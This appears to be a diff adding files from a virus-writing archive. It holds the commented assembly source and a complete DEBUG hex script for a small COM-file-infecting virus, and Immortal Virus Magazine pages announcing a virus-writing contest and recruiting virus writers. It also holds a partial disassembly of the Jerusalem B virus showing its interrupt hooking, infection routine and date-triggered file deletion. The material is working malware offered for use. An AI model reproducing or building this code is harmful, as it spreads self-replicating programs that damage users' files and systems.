+                db      0CDh, 20h, 7, 8, 9      ;int 20h
+                                                ;pop es
+
+loc_1:
+                call    sub_1                   ;
+
+
+
+s               endp
+
+
+sub_1           proc    near                    ;
+                pop     si                      ;locate all virus code via
+                sub     si,10Bh                 ;si, cause all offsets will
+                mov     bp,data_1[si]           ;change when virus infects
+                add     bp,103h                 ;a COM file
+                lea     dx,[si+1A2h]            ;offset of '*.COM',0 - via SI
+                xor     cx,cx                   ;clear cx - find only normal
+                                                ;attributes
+                mov     ah,4Eh                  ;find first file
+loc_2:
+                int     21h                     ;
+
+                jc      loc_6                   ;no files found? then quit
+                mov     dx,9Eh                  ;offset of filename found
+                mov     ax,3D02h                ;open file for read/write access
+                int     21h                     ;
+
+                mov     bx,ax                   ;save handle into bx
+                mov     ah,3Fh                  ;read from file
+                lea     dx,[si+1A8h]            ;offset of save buffer
+                mov     di,dx                   ;
+                mov     cx,3                    ;read three bytes
+                int     21h                     ;
+                
+                cmp     byte ptr [di],0E9h      ;compare buffer to virus id
+                                                ;string
+                je      loc_4                   ;
+loc_3:
+                mov     ah,4Fh                  ;find the next file
+                jmp     short loc_2             ;and test it
+loc_4:
+                mov     dx,[di+1]               ;lsh of offset
+                mov     data_1[si],dx           ;
+                xor     cx,cx                   ;msh of offset
+                mov     ax,4200h                ;set the file pointer
+                int     21h                     ;
+
+                mov     dx,di                   ;buffer to save read
+                mov     cx,2                    ;read two bytes
+                mov     ah,3Fh                  ;read from file
+                int     21h                     ;
+
+                cmp     word ptr [di],807h      ;compare buffer to virus id
+                je      loc_3                   ;same? then find another file
+
+;heres where we infect a file
+
+                xor     dx,dx                   ;set file pointer
+                xor     cx,cx                   ;ditto
+                mov     ax,4202h                ;set file pointer
+                int     21h                     ;
+
+                cmp     dx,0                    ;returns msh
+                jne     loc_3                   ;not the same? find another file
+                cmp     ah,0FEh                 ;lsh = 254???
+                jae     loc_3                   ;if more or equal find another file
+
+                mov     ds:data_2e[si],ax       ;point to data
+                mov     ah,40h                  ;write to file
+                lea     dx,[si+105h]            ;segment:offset of write buffer
+                mov     cx,0A3h                 ;write 163 bytes
+                int     21h                     ;
+
+                jc      loc_5                   ;error? then quit
+                mov     ax,4200h                ;set file pointer
+                xor     cx,cx                   ;to the top of the file
+                mov     dx,1                    ;
+                int     21h                     ;
+
+                mov     ah,40h                  ;write to file
+                lea     dx,[si+1ABh]            ;offset of jump to virus code
+                mov     cx,2                    ;two bytes
+                int     21h                     ;
+
+;now close the file
+
+loc_5:
+                mov     ah,3Eh                  ;close file
+                int     21h                     ;
+
+loc_6:
+                jmp     bp                      ;jump to original file
+
+data_1          dw      0                       ;
+                db      '*.COM',0               ;wild card search string
+
+
+sub_1           endp
+seg_a           ends
+                end     start
+-------------------------------------<CUT>-------------------------------------
+N TINY-163.COM
+E 0100 EB 06 90 CD 20 07 08 09 E8 00 00 5E 81 EE 0B 01 
+E 0110 8B AC A0 01 81 C5 03 01 8D 94 A2 01 33 C9 B4 4E 
+E 0120 CD 21 72 7A BA 9E 00 B8 02 3D CD 21 8B D8 B4 3F 
+E 0130 8D 94 A8 01 8B FA B9 03 00 CD 21 80 3D E9 74 04 
+E 0140 B4 4F EB DC 8B 55 01 89 94 A0 01 33 C9 B8 00 42 
+E 0150 CD 21 8B D7 B9 02 00 B4 3F CD 21 81 3D 07 08 74 
+E 0160 DF 33 D2 33 C9 B8 02 42 CD 21 83 FA 00 75 D1 80 
+E 0170 FC FE 73 CC 89 84 AB 01 B4 40 8D 94 05 01 B9 A3 
+E 0180 00 CD 21 72 15 B8 00 42 33 C9 BA 01 00 CD 21 B4 
+E 0190 40 8D 94 AB 01 B9 02 00 CD 21 B4 3E CD 21 FF E5 
+E 01A0 00 00 2A 2E 43 4F 4D 00 
+RCX
+00A8
+W
+Q
+-------------------------------------<CUT>-------------------------------------
+By: [Hacking Hell]!------------------------------Immortal Virus Magazine--------------------------
+-----------------------------------Issue 95.1----------------------------------
+-------------------------------------Contest-----------------------------------
+
+
+Now everybody look at this: We start a virus writing contest.
+
+ Rules:
+  Your Virus must be smaller than 1k, it must be appending, minimally one (1)
+   Payload, original ideas (no mutations), assembly source must be included,
+   and .COM infections.
+
+  Options:
+   Stealth
+   Cloaking
+   Built-in trojan
+   more payloads
+   Traverse
+   TSR
+   TBAV hide
+   etc.
+
+  Send it to our WHQ: Arrested Development (+31 77 547477), User:
+    Hacking Hell / Cyborg / Android / Arnie II / Foxman....
+
+
+By: [Cyborg], typed by [Hacking Hell] on his computer due incompatible
+ keyboard... (His computer was busy with leeching)
+------------------------------Immortal Virus Magazine--------------------------
+-----------------------------------Issue 95.1----------------------------------
+-------------------------------------Contact-----------------------------------
+
+So, you wanna contact us (why else would you read this boring stuff!).
+
+You can contact us at our WHQ: Arrested Development (+31 77 547477),
+ mail something to Hacking Hell, Cyborg, Android, Arnie II or FoxMan.
+
+We also will soon have a E-Mail address (UNKNOWN YET!)!! COOL! (This was a
+ butthead break-in!).
+
+If you wanna become a member and you can program h/p/a/v or you have Internet
+ please leave a mezzie to Hacking Hell or Cyborg (NOT to the other guyz!)
+
+We need some (very) good hacking / phreaking / anarchism / virus writer(s),
+ we would especially like a female virus-writer! I don't know any yet, mail
+ me and wake me up!
+
+ [Cyborg Interrupts]
+ Oh,no, he is searching for a [HACKING HELL: GET LOST CYBORG, WHAT'S WRONG
+                                             ABOUT A FEMALE IN OUR GROUP?!?]
+ Nothing's wrong withj it, I was just a lil'  childish and making a joke!!
+  You may proceed, my good Earthling...
+
+ [HACKING HELL BACK AGAIN]
+
+Cyborg, please stop discriminating the female race! Cyborg, don't touch this
+ keyboard! It's mine! Mine! Mine! Let me go!!!! BANG! That was my shotgun...
+ Shit, missed! Cyborg, next time you touch me, I will destroy you, I
+ programmed you, I can also eliminate you!
+
+ [Cyborg Interrupts again.]
+
+  Well, One: I did not discriminate anyone, and TWO, you cannot fight a Cyborg,
+   You may have programmed me, but you do not control me and you never will.
+   DataBank Reports:" To Control: to have the power to destroy."
+   Now, for you know that, you might proceed, if you know the magic word:
+   Ah, ah, ah, you didn't say the magic word, ah, ah, ah,......NO CARRIER
+
+ [HACKING HELL BACK AGAIN]
+WATCH ME! I will destroy you in a jiffy! And now for real: No Carrier...
+
+By: [Hacking Hell: On my own computer] and [Cyborg: Also on my computer!]...
diff --git a/textfiles.com/virus/jeru-b.asm b/textfiles.com/virus/jeru-b.asm
new file mode 100644
index 00000000..556a184d
--- /dev/null
+++ b/textfiles.com/virus/jeru-b.asm
@@ -0,0 +1,794 @@
+This is the Jerusalem B Virus.
+"JV.MOC"                                                              PAGE  0001
+
+0000:0000  E99200                    JMP     X0095
+0000:0003  7355                      JAE     X005A
+0000:0005  4D                        DEC     BP
+0000:0006  7344                      JAE     X004C
+0000:0008  6F73                      JG      X007D
+0000:000A  0001                      ADD     [BX+DI],AL
+0000:000C  BD1700                    MOV     BP,0017H
+0000:000F  0000                      ADD     [BX+SI],AL
+0000:0011  06                        PUSH    ES
+0000:0012  00A5FE00                  ADD     [DI+Y00FEH],AH
+0000:0016  F016                      LOCK  PUSH    SS
+0000:0018  17                        POP     SS
+0000:0019  7702                      JA      X001D
+0000:001B  BF053D                    MOV     DI,03D05H
+0000:001E  0CFB                      OR      AL,0FBH
+0000:0020  7D00                      JGE     X0022
+0000:0022  0000              X0022:  ADD     [BX+SI],AL
+0000:0024  0000                      ADD     [BX+SI],AL
+0000:0026  0000                      ADD     [BX+SI],AL
+0000:0028  0000                      ADD     [BX+SI],AL
+0000:002A  0000                      ADD     [BX+SI],AL
+0000:002C  0000                      ADD     [BX+SI],AL
+0000:002E  E8062A                    CALL    X2A37
+0000:0031  B10D                      MOV     CL,0DH
+0000:0033  800000                    ADD     BYTE PTR [BX+SI],00H
+0000:0036  008000B1                  ADD     [BX+SI+Y0B100H],AL
+0000:003A  0D5C00                    OR      AX,005CH
+0000:003D  B10D                      MOV     CL,0DH
+0000:003F  6C00                      JL      X0041
+0000:0041  B10D              X0041:  MOV     CL,0DH
+0000:0043  0004                      ADD     [SI],AL
+0000:0045  5F                        POP     DI
+0000:0046  0F                        POP     CS
+0000:0047  B400                      MOV     AH,00H
+0000:0049  C1                        RET                       ; INTRASEGMENT
+0000:004A  0D00F0            X004A:  OR      AX,0F000H
+0000:004D  06                        PUSH    ES
+0000:004E  004D5A                    ADD     [DI+05AH],CL
+0000:0051  2000                      AND     [BX+SI],AL
+0000:0053  1000                      ADC     [BX+SI],AL
+0000:0055  1900                      SBB     [BX+SI],AX
+0000:0057  0800                      OR      [BX+SI],AL
+0000:0059  7500                      JNZ     X005B
+0000:005B  7500              X005B:  JNZ     X005D
+0000:005D  6901              X005D:  JNS     X0060
+0000:005F  1007                      ADC     [BX],AL
+0000:0061  8419                      TEST    BL,[BX+DI]
+0000:0063  C500                      LDS     AX,[BX+SI]
+0000:0065  6901                      JNS     X0068
+0000:0067  1C00                      SBB     AL,00H
+0000:0069  0000                      ADD     [BX+SI],AL
+0000:006B  4C                X006B:  DEC     SP
+0000:006C  B000                      MOV     AL,00H
+0000:006E  CD21                      INT     021H
+0000:0070  050020                    ADD     AX,02000H
+0000:0073  0037                      ADD     [BX],DH
+
+"JV.MOC"                                                              PAGE  0002
+
+0000:0075  121C                      ADC     BL,[SI]
+0000:0077  0100                      ADD     [BX+SI],AX
+0000:0079  0210                      ADD     DL,[BX+SI]
+0000:007B  0010                      ADD     [BX+SI],DL
+0000:007D  17                X007D:  POP     SS
+0000:007E  0000                      ADD     [BX+SI],AL
+0000:0080  53                        PUSH    BX
+0000:0081  61E8                      JNO     X006B
+0000:0083  38434F                    CMP     [BP+DI+04FH],AL
+0000:0086  4D                        DEC     BP
+0000:0087  4D                        DEC     BP
+0000:0088  41                        INC     CX
+0000:0089  4E                        DEC     SI
+0000:008A  44                        INC     SP
+0000:008B  2E43                      INC     BX
+0000:008D  4F                        DEC     DI
+0000:008E  4D                        DEC     BP
+0000:008F  0100                      ADD     [BX+SI],AX
+0000:0091  0000                      ADD     [BX+SI],AL
+0000:0093  0000                      ADD     [BX+SI],AL
+0000:0095  FC                X0095:  CLD     
+0000:0096  B4E0                      MOV     AH,0E0H
+0000:0098  CD21                      INT     021H
+0000:009A  80FCE0                    CMP     AH,0E0H
+0000:009D  7316                      JAE     X00B5
+0000:009F  80FC03                    CMP     AH,03H
+0000:00A2  7211                      JB      X00B5
+0000:00A4  B4DD                      MOV     AH,0DDH
+0000:00A6  BF0001                    MOV     DI,0100H
+0000:00A9  BE1007                    MOV     SI,0710H
+0000:00AC  03F7                      ADD     SI,DI
+0000:00AE  2E8B8D1100                MOV     CX,CS:[DI+Y0011H]
+0000:00B3  CD21                      INT     021H
+0000:00B5  8CC8              X00B5:  MOV     AX,CS
+0000:00B7  051000                    ADD     AX,0010H
+0000:00BA  8ED0                      MOV     SS,AX
+0000:00BC  BC0007                    MOV     SP,0700H
+0000:00BF  50                        PUSH    AX
+0000:00C0  B8C500                    MOV     AX,00C5H
+0000:00C3  50                        PUSH    AX
+0000:00C4  CB                        RET                       ; INTERSEGMENT
+0000:00C5  FC                X00C5:  CLD     
+0000:00C6  06                        PUSH    ES
+0000:00C7  2E8C063100                MOV     CS:[Y0031H],ES
+0000:00CC  2E8C063900                MOV     CS:[Y0039H],ES
+0000:00D1  2E8C063D00                MOV     CS:[Y003DH],ES
+0000:00D6  2E8C064100                MOV     CS:[Y0041H],ES
+0000:00DB  8CC0                      MOV     AX,ES
+0000:00DD  051000                    ADD     AX,0010H
+0000:00E0  2E01064900                ADD     CS:[Y0049H],AX
+0000:00E5  2E01064500                ADD     CS:[Y0045H],AX
+0000:00EA  B4E0                      MOV     AH,0E0H
+0000:00EC  CD21                      INT     021H
+0000:00EE  80FCE0                    CMP     AH,0E0H
+0000:00F1  7313                      JAE     X0106
+0000:00F3  80FC03                    CMP     AH,03H
+
+"JV.MOC"                                                              PAGE  0003
+
+0000:00F6  07                        POP     ES
+0000:00F7  2E8E164500                MOV     SS,CS:[Y0045H]
+0000:00FC  2E8B264300                MOV     SP,CS:[Y0043H]
+0000:0101  2EFF2E4700                JMP     CS:[Y0047H]
+0000:0106  33C0              X0106:  XOR     AX,AX
+0000:0108  8EC0                      MOV     ES,AX
+0000:010A  26A1FC03                  MOV     AX,ES:Y03FCH
+0000:010E  2EA34B00                  MOV     CS:Y004BH,AX
+0000:0112  26A0FE03                  MOV     AL,ES:Y03FEH
+0000:0116  2EA24D00                  MOV     CS:Y004DH,AL
+0000:011A  26C706FC03F3A5            MOV     WORD PTR ES:[Y03FCH],0A5F3H
+0000:0121  26C606FE03CB              MOV     BYTE PTR ES:[Y03FEH],0CBH
+0000:0127  58                        POP     AX
+0000:0128  051000                    ADD     AX,0010H
+0000:012B  8EC0                      MOV     ES,AX
+0000:012D  0E                        PUSH    CS
+0000:012E  1F                        POP     DS
+0000:012F  B91007                    MOV     CX,0710H
+0000:0132  D1E9                      SHR     CX,1
+0000:0134  33F6                      XOR     SI,SI
+0000:0136  8BFE                      MOV     DI,SI
+0000:0138  06                        PUSH    ES
+0000:0139  B84201                    MOV     AX,0142H
+0000:013C  50                        PUSH    AX
+0000:013D  EAFC030000                JMP     X0000_03FC
+0000:0142  8CC8                      MOV     AX,CS
+0000:0144  8ED0                      MOV     SS,AX
+0000:0146  BC0007                    MOV     SP,0700H
+0000:0149  33C0                      XOR     AX,AX
+0000:014B  8ED8                      MOV     DS,AX
+0000:014D  2EA14B00                  MOV     AX,CS:Y004BH
+0000:0151  A3FC03                    MOV     Y03FCH,AX
+0000:0154  2EA04D00                  MOV     AL,CS:Y004DH
+0000:0158  A2FE03                    MOV     Y03FEH,AL
+0000:015B  8BDC                      MOV     BX,SP
+0000:015D  B104                      MOV     CL,04H
+0000:015F  D3EB                      SHR     BX,CL
+0000:0161  83C310                    ADD     BX,0010H
+0000:0164  2E891E3300                MOV     CS:[Y0033H],BX
+0000:0169  B44A                      MOV     AH,04AH
+0000:016B  2E8E063100                MOV     ES,CS:[Y0031H]
+0000:0170  CD21                      INT     021H
+0000:0172  B82135                    MOV     AX,03521H
+0000:0175  CD21                      INT     021H
+0000:0177  2E891E1700                MOV     CS:[Y0017H],BX
+0000:017C  2E8C061900                MOV     CS:[Y0019H],ES
+0000:0181  0E                        PUSH    CS
+0000:0182  1F                        POP     DS
+0000:0183  BA5B02                    MOV     DX,025BH
+0000:0186  B82125                    MOV     AX,02521H
+0000:0189  CD21                      INT     021H
+0000:018B  8E063100                  MOV     ES,[Y0031H]
+0000:018F  268E062C00                MOV     ES,ES:[Y002CH]
+0000:0194  33FF                      XOR     DI,DI
+0000:0196  B9FF7F                    MOV     CX,07FFFH
+0000:0199  32C0                      XOR     AL,AL
+
+"JV.MOC"                                                              PAGE  0004
+
+0000:019B  F2AE              X019B:  REPNE  SCASB   
+0000:019D  263805                    CMP     ES:[DI],AL
+0000:01A0  E0F9                      LOOPNZ  X019B
+0000:01A2  8BD7                      MOV     DX,DI
+0000:01A4  83C203                    ADD     DX,0003H
+0000:01A7  B8004B                    MOV     AX,04B00H
+0000:01AA  06                        PUSH    ES
+0000:01AB  1F                        POP     DS
+0000:01AC  0E                        PUSH    CS
+0000:01AD  07                        POP     ES
+0000:01AE  BB3500                    MOV     BX,0035H
+0000:01B1  1E                        PUSH    DS
+0000:01B2  06                        PUSH    ES
+0000:01B3  50                        PUSH    AX
+0000:01B4  53                        PUSH    BX
+0000:01B5  51                        PUSH    CX
+0000:01B6  52                        PUSH    DX
+0000:01B7  B42A                      MOV     AH,02AH
+0000:01B9  CD21                      INT     021H
+0000:01BB  2EC6060E0000              MOV     BYTE PTR CS:[Y000EH],00H
+0000:01C1  81F9C307                  CMP     CX,07C3H
+0000:01C5  7430                      JZ      X01F7
+0000:01C7  3C05                      CMP     AL,05H
+0000:01C9  750D                      JNZ     X01D8
+0000:01CB  80FA0D                    CMP     DL,0DH
+0000:01CE  7508                      JNZ     X01D8
+0000:01D0  2EFE060E00                INC     BYTE PTR CS:[Y000EH]
+0000:01D5  EB20                      JMP     X01F7
+0000:01D7  90                        NOP     
+0000:01D8  B80835            X01D8:  MOV     AX,03508H
+0000:01DB  CD21                      INT     021H
+0000:01DD  2E891E1300                MOV     CS:[Y0013H],BX
+0000:01E2  2E8C061500                MOV     CS:[Y0015H],ES
+0000:01E7  0E                        PUSH    CS
+0000:01E8  1F                        POP     DS
+0000:01E9  C7061F00907E              MOV     WORD PTR [Y001FH],07E90H
+0000:01EF  B80825                    MOV     AX,02508H
+0000:01F2  BA1E02                    MOV     DX,021EH
+0000:01F5  CD21                      INT     021H
+0000:01F7  5A                X01F7:  POP     DX
+0000:01F8  59                        POP     CX
+0000:01F9  5B                        POP     BX
+0000:01FA  58                        POP     AX
+0000:01FB  07                        POP     ES
+0000:01FC  1F                        POP     DS
+0000:01FD  9C                        PUSHF   
+0000:01FE  2EFF1E1700                CALL    CS:[Y0017H]
+0000:0203  1E                        PUSH    DS
+0000:0204  07                        POP     ES
+0000:0205  B449                      MOV     AH,049H
+0000:0207  CD21                      INT     021H
+0000:0209  B44D                      MOV     AH,04DH
+0000:020B  CD21                      INT     021H
+0000:020D  B431                      MOV     AH,031H
+0000:020F  BA0006                    MOV     DX,0600H
+0000:0212  B104                      MOV     CL,04H
+
+"JV.MOC"                                                              PAGE  0005
+
+0000:0214  D3EA                      SHR     DX,CL
+0000:0216  83C210                    ADD     DX,0010H
+0000:0219  CD21                      INT     021H
+0000:021B  32C0                      XOR     AL,AL
+0000:021D  CF                        IRET    
+0000:021E  2E833E1F0002              CMP     WORD PTR CS:[Y001FH],0002H
+0000:0224  7517                      JNZ     X023D
+0000:0226  50                        PUSH    AX
+0000:0227  53                        PUSH    BX
+0000:0228  51                        PUSH    CX
+0000:0229  52                        PUSH    DX
+0000:022A  55                        PUSH    BP
+0000:022B  B80206                    MOV     AX,0602H
+0000:022E  B787                      MOV     BH,087H
+0000:0230  B90505                    MOV     CX,0505H
+0000:0233  BA1010                    MOV     DX,01010H
+0000:0236  CD10                      INT     010H
+0000:0238  5D                        POP     BP
+0000:0239  5A                        POP     DX
+0000:023A  59                        POP     CX
+0000:023B  5B                        POP     BX
+0000:023C  58                        POP     AX
+0000:023D  2EFF0E1F00        X023D:  DEC     WORD PTR CS:[Y001FH]
+0000:0242  7512                      JNZ     X0256
+0000:0244  2EC7061F000100            MOV     WORD PTR CS:[Y001FH],0001H
+0000:024B  50                        PUSH    AX
+0000:024C  51                        PUSH    CX
+0000:024D  56                        PUSH    SI
+0000:024E  B90140                    MOV     CX,04001H
+0000:0251  F3AC                      REPE  LODSB   
+0000:0253  5E                        POP     SI
+0000:0254  59                        POP     CX
+0000:0255  58                        POP     AX
+0000:0256  2EFF2E1300        X0256:  JMP     CS:[Y0013H]
+0000:025B  9C                X025B:  PUSHF   
+0000:025C  80FCE0                    CMP     AH,0E0H
+0000:025F  7505                      JNZ     X0266
+0000:0261  B80003                    MOV     AX,0300H
+0000:0264  9D                        POPF    
+0000:0265  CF                        IRET    
+0000:0266  80FCDD            X0266:  CMP     AH,0DDH
+0000:0269  7413                      JZ      X027E
+0000:026B  80FCDE                    CMP     AH,0DEH
+0000:026E  7428                      JZ      X0298
+0000:0270  3D004B                    CMP     AX,04B00H
+0000:0273  7503                      JNZ     X0278
+0000:0275  E9B400                    JMP     X032C
+0000:0278  9D                X0278:  POPF    
+0000:0279  2EFF2E1700                JMP     CS:[Y0017H]
+0000:027E  58                X027E:  POP     AX
+0000:027F  58                        POP     AX
+0000:0280  B80001                    MOV     AX,0100H
+0000:0283  2EA30A00                  MOV     CS:Y000AH,AX
+0000:0287  58                        POP     AX
+0000:0288  2EA30C00                  MOV     CS:Y000CH,AX
+0000:028C  F3A4                      REPE  MOVSB   
+
+"JV.MOC"                                                              PAGE  0006
+
+0000:028E  9D                        POPF    
+0000:028F  2EA10F00                  MOV     AX,CS:Y000FH
+0000:0293  2EFF2E0A00                JMP     CS:[Y000AH]
+0000:0298  83C406            X0298:  ADD     SP,0006H
+0000:029B  9D                        POPF    
+0000:029C  8CC8                      MOV     AX,CS
+0000:029E  8ED0                      MOV     SS,AX
+0000:02A0  BC1007                    MOV     SP,0710H
+0000:02A3  06                        PUSH    ES
+0000:02A4  06                        PUSH    ES
+0000:02A5  33FF                      XOR     DI,DI
+0000:02A7  0E                        PUSH    CS
+0000:02A8  07                        POP     ES
+0000:02A9  B91000                    MOV     CX,0010H
+0000:02AC  8BF3                      MOV     SI,BX
+0000:02AE  BF2100                    MOV     DI,0021H
+0000:02B1  F3A4                      REPE  MOVSB   
+0000:02B3  8CD8                      MOV     AX,DS
+0000:02B5  8EC0                      MOV     ES,AX
+0000:02B7  2EF7267A00                MUL     WORD PTR CS:[Y007AH]
+0000:02BC  2E03062B00                ADD     AX,CS:[Y002BH]
+0000:02C1  83D200                    ADC     DX,0000H
+0000:02C4  2EF7367A00                DIV     WORD PTR CS:[Y007AH]
+0000:02C9  8ED8                      MOV     DS,AX
+0000:02CB  8BF2                      MOV     SI,DX
+0000:02CD  8BFA                      MOV     DI,DX
+0000:02CF  8CC5                      MOV     BP,ES
+0000:02D1  2E8B1E2F00                MOV     BX,CS:[Y002FH]
+0000:02D6  0BDB                      OR      BX,BX
+0000:02D8  7413                      JZ      X02ED
+0000:02DA  B90080            X02DA:  MOV     CX,08000H
+0000:02DD  F3A5                      REPE  MOVSW   
+0000:02DF  050010                    ADD     AX,01000H
+0000:02E2  81C50010                  ADD     BP,01000H
+0000:02E6  8ED8                      MOV     DS,AX
+0000:02E8  8EC5                      MOV     ES,BP
+0000:02EA  4B                        DEC     BX
+0000:02EB  75ED                      JNZ     X02DA
+0000:02ED  2E8B0E2D00        X02ED:  MOV     CX,CS:[Y002DH]
+0000:02F2  F3A4                      REPE  MOVSB   
+0000:02F4  58                        POP     AX
+0000:02F5  50                        PUSH    AX
+0000:02F6  051000                    ADD     AX,0010H
+0000:02F9  2E01062900                ADD     CS:[Y0029H],AX
+0000:02FE  2E01062500                ADD     CS:[Y0025H],AX
+0000:0303  2EA12100                  MOV     AX,CS:Y0021H
+0000:0307  1F                        POP     DS
+0000:0308  07                        POP     ES
+0000:0309  2E8E162900                MOV     SS,CS:[Y0029H]
+0000:030E  2E8B262700                MOV     SP,CS:[Y0027H]
+0000:0313  2EFF2E2300                JMP     CS:[Y0023H]
+0000:0318  33C9              X0318:  XOR     CX,CX
+0000:031A  B80143                    MOV     AX,04301H
+0000:031D  CD21                      INT     021H
+0000:031F  B441                      MOV     AH,041H
+0000:0321  CD21                      INT     021H
+
+"JV.MOC"                                                              PAGE  0007
+
+0000:0323  B8004B                    MOV     AX,04B00H
+0000:0326  9D                        POPF    
+0000:0327  2EFF2E1700                JMP     CS:[Y0017H]
+0000:032C  2E803E0E0001      X032C:  CMP     BYTE PTR CS:[Y000EH],01H
+0000:0332  74E4                      JZ      X0318
+0000:0334  2EC7067000FFFF            MOV     WORD PTR CS:[Y0070H],0FFFFH
+0000:033B  2EC7068F000000            MOV     WORD PTR CS:[Y008FH],0000H
+0000:0342  2E89168000                MOV     CS:[Y0080H],DX
+0000:0347  2E8C1E8200                MOV     CS:[Y0082H],DS
+0000:034C  50                        PUSH    AX
+0000:034D  53                        PUSH    BX
+0000:034E  51                        PUSH    CX
+0000:034F  52                        PUSH    DX
+0000:0350  56                        PUSH    SI
+0000:0351  57                        PUSH    DI
+0000:0352  1E                        PUSH    DS
+0000:0353  06                        PUSH    ES
+0000:0354  FC                        CLD     
+0000:0355  8BFA                      MOV     DI,DX
+0000:0357  32D2                      XOR     DL,DL
+0000:0359  807D013A                  CMP     BYTE PTR [DI+01H],03AH
+0000:035D  7505                      JNZ     X0364
+0000:035F  8A15                      MOV     DL,[DI]
+0000:0361  80E21F                    AND     DL,01FH
+0000:0364  B436              X0364:  MOV     AH,036H
+0000:0366  CD21                      INT     021H
+0000:0368  3DFFFF                    CMP     AX,0FFFFH
+0000:036B  7503                      JNZ     X0370
+0000:036D  E97702            X036D:  JMP     X05E7
+0000:0370  F7E3              X0370:  MUL     BX
+0000:0372  F7E1                      MUL     CX
+0000:0374  0BD2                      OR      DX,DX
+0000:0376  7505                      JNZ     X037D
+0000:0378  3D1007                    CMP     AX,0710H
+0000:037B  72F0                      JB      X036D
+0000:037D  2E8B168000        X037D:  MOV     DX,CS:[Y0080H]
+0000:0382  1E                        PUSH    DS
+0000:0383  07                        POP     ES
+0000:0384  32C0                      XOR     AL,AL
+0000:0386  B94100                    MOV     CX,0041H
+0000:0389  F2AE                      REPNE  SCASB   
+0000:038B  2E8B368000                MOV     SI,CS:[Y0080H]
+0000:0390  8A04              X0390:  MOV     AL,[SI]
+0000:0392  0AC0                      OR      AL,AL
+0000:0394  740E                      JZ      X03A4
+0000:0396  3C61                      CMP     AL,061H
+0000:0398  7207                      JB      X03A1
+0000:039A  3C7A                      CMP     AL,07AH
+0000:039C  7703                      JA      X03A1
+0000:039E  802C20                    SUB     BYTE PTR [SI],020H
+0000:03A1  46                X03A1:  INC     SI
+0000:03A2  EBEC                      JMP     X0390
+0000:03A4  B90B00            X03A4:  MOV     CX,000BH
+0000:03A7  2BF1                      SUB     SI,CX
+0000:03A9  BF8400                    MOV     DI,0084H
+0000:03AC  0E                        PUSH    CS
+
+"JV.MOC"                                                              PAGE  0008
+
+0000:03AD  07                        POP     ES
+0000:03AE  B90B00                    MOV     CX,000BH
+0000:03B1  F3A6                      REPE  CMPSB   
+0000:03B3  7503                      JNZ     X03B8
+0000:03B5  E92F02                    JMP     X05E7
+0000:03B8  B80043            X03B8:  MOV     AX,04300H
+0000:03BB  CD21                      INT     021H
+0000:03BD  7205                      JB      X03C4
+0000:03BF  2E890E7200                MOV     CS:[Y0072H],CX
+0000:03C4  7225              X03C4:  JB      X03EB
+0000:03C6  32C0                      XOR     AL,AL
+0000:03C8  2EA24E00                  MOV     CS:Y004EH,AL
+0000:03CC  1E                        PUSH    DS
+0000:03CD  07                        POP     ES
+0000:03CE  8BFA                      MOV     DI,DX
+0000:03D0  B94100                    MOV     CX,0041H
+0000:03D3  F2AE                      REPNE  SCASB   
+0000:03D5  807DFE4D                  CMP     BYTE PTR [DI-02H],04DH
+0000:03D9  740B                      JZ      X03E6
+0000:03DB  807DFE6D                  CMP     BYTE PTR [DI-02H],06DH
+0000:03DF  7405                      JZ      X03E6
+0000:03E1  2EFE064E00                INC     BYTE PTR CS:[Y004EH]
+0000:03E6  B8003D            X03E6:  MOV     AX,03D00H
+0000:03E9  CD21                      INT     021H
+0000:03EB  725A              X03EB:  JB      X0447
+0000:03ED  2EA37000                  MOV     CS:Y0070H,AX
+0000:03F1  8BD8                      MOV     BX,AX
+0000:03F3  B80242                    MOV     AX,04202H
+0000:03F6  B9FFFF                    MOV     CX,0FFFFH
+0000:03F9  BAFBFF                    MOV     DX,0FFFBH
+0000:03FC  CD21              X03FC:  INT     021H
+0000:03FE  72EB                      JB      X03EB
+0000:0400  050500                    ADD     AX,0005H
+0000:0403  2EA31100                  MOV     CS:Y0011H,AX
+0000:0407  B90500                    MOV     CX,0005H
+0000:040A  BA6B00                    MOV     DX,006BH
+0000:040D  8CC8                      MOV     AX,CS
+0000:040F  8ED8                      MOV     DS,AX
+0000:0411  8EC0                      MOV     ES,AX
+0000:0413  B43F                      MOV     AH,03FH
+0000:0415  CD21                      INT     021H
+0000:0417  8BFA                      MOV     DI,DX
+0000:0419  BE0500                    MOV     SI,0005H
+0000:041C  F3A6                      REPE  CMPSB   
+0000:041E  7507                      JNZ     X0427
+0000:0420  B43E                      MOV     AH,03EH
+0000:0422  CD21                      INT     021H
+0000:0424  E9C001                    JMP     X05E7
+0000:0427  B82435            X0427:  MOV     AX,03524H
+0000:042A  CD21                      INT     021H
+0000:042C  891E1B00                  MOV     [Y001BH],BX
+0000:0430  8C061D00                  MOV     [Y001DH],ES
+0000:0434  BA1B02                    MOV     DX,021BH
+0000:0437  B82425                    MOV     AX,02524H
+0000:043A  CD21                      INT     021H
+0000:043C  C5168000                  LDS     DX,[Y0080H]
+
+"JV.MOC"                                                              PAGE  0009
+
+0000:0440  33C9                      XOR     CX,CX
+0000:0442  B80143                    MOV     AX,04301H
+0000:0445  CD21                      INT     021H
+0000:0447  723B              X0447:  JB      X0484
+0000:0449  2E8B1E7000                MOV     BX,CS:[Y0070H]
+0000:044E  B43E                      MOV     AH,03EH
+0000:0450  CD21                      INT     021H
+0000:0452  2EC7067000FFFF            MOV     WORD PTR CS:[Y0070H],0FFFFH
+0000:0459  B8023D                    MOV     AX,03D02H
+0000:045C  CD21                      INT     021H
+0000:045E  7224                      JB      X0484
+0000:0460  2EA37000                  MOV     CS:Y0070H,AX
+0000:0464  8CC8                      MOV     AX,CS
+0000:0466  8ED8                      MOV     DS,AX
+0000:0468  8EC0                      MOV     ES,AX
+0000:046A  8B1E7000                  MOV     BX,[Y0070H]
+0000:046E  B80057                    MOV     AX,05700H
+0000:0471  CD21                      INT     021H
+0000:0473  89167400                  MOV     [Y0074H],DX
+0000:0477  890E7600                  MOV     [Y0076H],CX
+0000:047B  B80042                    MOV     AX,04200H
+0000:047E  33C9                      XOR     CX,CX
+0000:0480  8BD1                      MOV     DX,CX
+0000:0482  CD21                      INT     021H
+0000:0484  723D              X0484:  JB      X04C3
+0000:0486  803E4E0000                CMP     BYTE PTR [Y004EH],00H
+0000:048B  7403                      JZ      X0490
+0000:048D  EB57                      JMP     X04E6
+0000:048F  90                        NOP     
+0000:0490  BB0010            X0490:  MOV     BX,01000H
+0000:0493  B448                      MOV     AH,048H
+0000:0495  CD21                      INT     021H
+0000:0497  730B                      JAE     X04A4
+0000:0499  B43E                      MOV     AH,03EH
+0000:049B  8B1E7000                  MOV     BX,[Y0070H]
